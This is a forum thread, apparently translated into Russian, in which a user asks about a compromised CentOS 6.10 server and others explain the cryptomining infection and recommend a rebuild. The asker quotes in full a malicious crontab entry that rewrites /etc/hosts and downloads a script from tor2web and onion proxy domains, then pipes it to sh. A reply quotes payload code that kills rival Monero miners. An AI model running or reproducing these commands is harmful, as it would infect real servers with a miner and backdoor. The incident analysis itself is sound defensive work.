Взломанный сервер CentOS 6.10
Я работаю на взломанном сервере . CentOS 6.10 с [kthreadd] занимает большую часть ЦП.
Старый crontab удален, а следующий контент помещен на место:
*/4 * * * * R=$(shuf -i 1-29 -n 1);sleep ${R:-0};BP=$(dirname "$(command -v yes)");BP=${BP:-"/usr/bin"};G1="curl";if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ];then G1="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && G1="$f" && break;done;fi;G2="wget";if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ];then G2="echo";for f in ${BP}/*;do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && G2="$f" && break;done;fi;if [ $(cat /etc/hosts|grep -i "onion.\|timesync.su\|tor2web"|wc -l) -ne 0 ];then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1;fi; C=" -fsSLk --connect-timeout 26 --max-time 75 ";W=" --quiet --tries=1 --no-check-certificate --connect-timeout=26 --timeout=75 ";H="https://an7kmd2wp4xo7hpr";T1=".tor2web.su/";T2=".d2web.org/";T3=".onion.sh/";P="src/ldm";($G1 $C $H$T1$P||$G1 $C $H$T2$P||$G1 $C $H$T3$P||$G2 $W $H$T1$P||$G2 $W $H$T2$P||$G2 $W $H$T3$P)|sh &
Я также нашел следующий сценарий оболочки в файловой структуре: pastebin
Итак, исходя из всего, что я обнаружил в системе, я выяснил, что все скажут мне создать новый сервер. И я, безусловно, буду. Но, может быть, найдется кто-то, кто захочет внимательно изучить сценарий. Я действительно хотел бы знать, как вообще была взломана система
Сам скрипт не поможет определить вектор атаки. Вы можете получить общее представление, указав расположение сценария и пользователя, от имени которого он был запущен. Если это был root, это тоже не поможет.
Так что да, здесь важно то, что с этого момента ваш сервер будет оставаться взломанным, что бы вы ни делали.
Я полагаю, вы уже удалили вредоносное задание cron? Скорее всего, есть какой-то бэкдор или оставшийся процесс, который возродится и / или воссоздает cron.
Если вы хотите, чтобы сервер работал, вы можете настроить утилиту аудита с правилами модификации файлов, чтобы видеть, какие процессы что меняют. И поднимитесь по цепочке, чтобы найти законный скомпрометированный процесс.
Как вас скомпрометировали - это, в первую очередь, правильный вопрос, чтобы разобраться в основной причине. Но это не то, на что можно ответить, посмотрев сценарий. Сценарий - это полезная нагрузка.Он был установлен каким-то образом, например, учетными данными в руках злоумышленника или цепочкой эксплойтов.
Кроме того, простое знание того, как этот хост был взломан, не решит никаких других уязвимостей в вашей среде.
Рассмотрите возможность привлечения консультанта по безопасности для проведения тестирования на проникновение или упражнений красной группы. Посторонний человек может лучше увидеть уязвимости.
Очевидно, что домен an7kmd2wp4xo7hpr.tor2web.su имеет плохую репутацию как вредоносный сайт.
На первый взгляд, то, что происходит, кажется относительно простым: майнинг криптовалют .
elif [ -f /proc/${p}/comm ]; then
xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)
fi
if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} ${rm} -rf "${xmf}" >/dev/null 2>&1; fi
Убить конкурирующих майнеров и выжить после перезагрузки - больше прибыли для злоумышленников. Не первый, кто сделал это, это было закономерностью, наблюдаемой на ящиках Linux в течение нескольких месяцев , если не дольше.